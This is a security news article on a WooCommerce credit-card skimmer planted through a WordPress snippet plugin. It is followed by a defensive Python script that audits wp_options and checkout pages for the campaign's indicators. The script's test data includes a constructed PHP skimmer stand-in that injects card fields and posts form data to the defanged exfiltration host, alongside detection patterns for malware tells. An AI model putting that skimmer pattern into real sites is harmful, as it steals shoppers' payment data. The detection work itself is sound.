WordPress Plugin Exploited to Steal Credit Card Data from E-commerce Sites

Unknown threat actors are abusing a lesser-known code snippet plugin for WordPress to plant malicious PHP code on victim sites that is capable of capturing credit card data.

The campaign, detected by Sucuri on May 11, 2024, involves the misuse of a WordPress plugin called Dessky Snippets, which lets users add custom PHP code to their sites. It has around 200 active installations.

Such attacks typically exploit previously disclosed flaws in WordPress plugins or easily guessable credentials to obtain administrator access, then install additional plugins (legitimate or otherwise) for post-exploitation.

Sucuri said the Dessky Snippets plugin is being used to implant a server-side PHP credit card skimmer on compromised sites and harvest financial data.

"This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code," security researcher Ben Martin stated.

Specifically, the code adds several extra fields to the billing form that request credit card details, including the cardholder's name, address, card number, expiration date and Card Verification Value (CVV), which are then exfiltrated to the URL "hxxps://2of[.]cc/wp-content/."

A noteworthy detail of the campaign is that the billing form associated with the bogus overlay has its autocomplete attribute disabled (i.e., autocomplete="off").

"By manually disabling this feature on the fake checkout form, it reduces the likelihood that the browser will warn the user that sensitive information is being entered, and ensures that the fields stay blank until manually filled out by the user, reducing suspicion and making the fields appear as regular, necessary inputs for the transaction," Martin said.

This is not the first time threat actors have turned legitimate code snippet plugins to malicious ends. Last month, the company identified the use of the WPCode code snippet plugin to inject malicious JavaScript into WordPress sites and redirect visitors to VexTrio domains.

Another malware campaign, tracked as Sign1, has infected more than 39,000 WordPress sites over the past six months by injecting malicious JavaScript via the Simple Custom CSS and JS plugin to redirect visitors to scam sites.

WordPress site owners, particularly those running e-commerce functionality, are advised to keep WordPress core and plugins up to date, use strong passwords to resist brute-force attacks, and regularly audit their sites for signs of malware or unauthorized changes.
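As a concrete way to carry out the audit recommended above against the indicators reported for this campaign (PHP stored in the dnsp_settings option of wp_options, extra card fields injected into the WooCommerce billing form with autocomplete="off", and the 2of[.]cc exfiltration URL), here is an added example that is not part of the article and not Sucuri's tooling. It uses an in-memory SQLite copy of wp_options in place of the real MySQL table; the sample rows and checkout HTML are constructed, and the stored-PHP stand-in, the shop.example hostname and the generic obfuscation indicators (eval, base64_decode and similar) are assumptions, not the actual payload.

```python
import re
import sqlite3
from html.parser import HTMLParser

# Constructed stand-in for the stored PHP the article describes (hooks the
# WooCommerce checkout, adds a card field, posts the form to the skimmer URL).
# It is not the real payload, only something for the audit below to find.
SKIMMER_STANDIN = (
    "<?php\n"
    "add_action('woocommerce_after_checkout_billing_form', function () {\n"
    "    echo '<input type=\"text\" name=\"cc_number\" autocomplete=\"off\">';\n"
    "});\n"
    "add_action('woocommerce_checkout_process', function () {\n"
    "    wp_remote_post('hxxps://2of[.]cc/wp-content/', ['body' => $_POST]);\n"
    "});\n"
)

# Constructed wp_options rows (option_name, option_value); only dnsp_settings is malicious.
SAMPLE_WP_OPTIONS = [
    ("siteurl", "https://shop.example"),
    ("blogdescription", "A shop that also sells PHP books"),
    ("dnsp_settings", SKIMMER_STANDIN),
]

# Indicators from the article plus generic PHP-malware tells (the latter are assumed).
INDICATORS = {
    "php_open_tag": re.compile(r"<\?(?:php|=)", re.I),
    "skimmer_exfil_url": re.compile(r"2of\[?\.\]?cc", re.I),  # live or defanged form
    "woocommerce_checkout_hook": re.compile(r"woocommerce_\w*checkout\w*", re.I),
    "outbound_request": re.compile(r"\b(?:wp_remote_post|curl_exec|file_get_contents)\s*\(", re.I),
    "obfuscation": re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}

# SQL pre-filter; runs unchanged against a real MySQL wp_options table
# (change the wp_ prefix if the site uses another one).
AUDIT_QUERY = """
SELECT option_name, option_value FROM wp_options
WHERE option_value LIKE '%<?%' OR option_value LIKE '%eval(%'
   OR option_value LIKE '%base64_decode(%' OR option_name = 'dnsp_settings'
"""

def load_sample_wp_options():
    """In-memory SQLite stand-in for wp_options holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_options (option_name TEXT, option_value TEXT)")
    conn.executemany("INSERT INTO wp_options VALUES (?, ?)", SAMPLE_WP_OPTIONS)
    return conn

def audit_wp_options(conn):
    """Return {option_name: [indicator, ...]} for rows that look like stored PHP malware."""
    findings = {}
    for name, value in conn.execute(AUDIT_QUERY):
        hits = sorted(label for label, rx in INDICATORS.items() if rx.search(value))
        if hits:
            findings[name] = hits
    return findings

class _InputCollector(HTMLParser):
    """Collect the attributes of every <input> on a checkout page."""
    def __init__(self):
        super().__init__()
        self.inputs = []
    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))

# WooCommerce's own billing fields never collect card data (the payment gateway
# does), so a billing input named like a card field is suspect on its own.
CARD_FIELD_NAME = re.compile(r"card|cc_|cvv|cvc|expir|exp_", re.I)

def find_injected_card_fields(html):
    """Return [(field_name, autocomplete_is_off), ...] for card-like inputs."""
    parser = _InputCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.inputs:
        name = attrs.get("name") or ""
        if CARD_FIELD_NAME.search(name):
            hits.append((name, (attrs.get("autocomplete") or "").lower() == "off"))
    return hits

# Constructed checkout HTML: two normal WooCommerce billing fields plus three
# injected card fields with autocomplete disabled, as the article describes.
SAMPLE_CHECKOUT_HTML = """
<form name="checkout" class="checkout woocommerce-checkout">
  <input type="text" name="billing_first_name" autocomplete="given-name">
  <input type="text" name="billing_address_1" autocomplete="address-line1">
  <input type="text" name="cc_number" placeholder="Card number" autocomplete="off">
  <input type="text" name="cc_exp" placeholder="MM/YY" autocomplete="off">
  <input type="text" name="cc_cvv" placeholder="CVV" autocomplete="off">
</form>
"""

if __name__ == "__main__":
    for option, reasons in audit_wp_options(load_sample_wp_options()).items():
        print(f"wp_options.{option}: {', '.join(reasons)}")
    for field, ac_off in find_injected_card_fields(SAMPLE_CHECKOUT_HTML):
        print(f"checkout field {field}: autocomplete off = {ac_off}")
```

On a live site the AUDIT_QUERY can be run as-is with WP-CLI's `wp db query` (or any MySQL client), and `wp option get dnsp_settings` prints the stored value for inspection; the second check is meant to be run over the rendered checkout page as a logged-out visitor, since the injected fields only exist in the served HTML. A legitimate snippet plugin will of course also store PHP in wp_options, so a php_open_tag hit alone means "read this option", while the exfiltration URL or a checkout hook posting $_POST elsewhere is the signal that matters.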
